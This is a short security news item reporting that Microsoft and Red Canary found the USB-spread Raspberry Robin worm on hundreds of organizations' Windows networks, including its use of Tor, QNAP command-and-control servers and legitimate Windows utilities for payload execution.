Hundreds of organizations across different industries were identified by Microsoft to have their Windows networks infected with the Raspberry Robin malware, which was discovered to proliferate through infected USB devices by Red Canary researchers, according to BleepingComputer.
Malicious actors have yet to exploit network access provided by the Raspberry Robin malware even though the worm had been observed linking to Tor network addresses, said Microsoft in a private threat intelligence advisory given to Microsoft Defender for Endpoint subscribers.
The findings come after Red Canary had detected Raspberry Robin on its customers' networks in September after the malware was found by Sekoia to have leveraged QNAP network-attached storage devices as command-and-control servers. Red Canary then reported that legitimate Windows utilities including msiexec, fodhelper, and odbcconf have been used for payload execution.
"While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes," said Red Canary.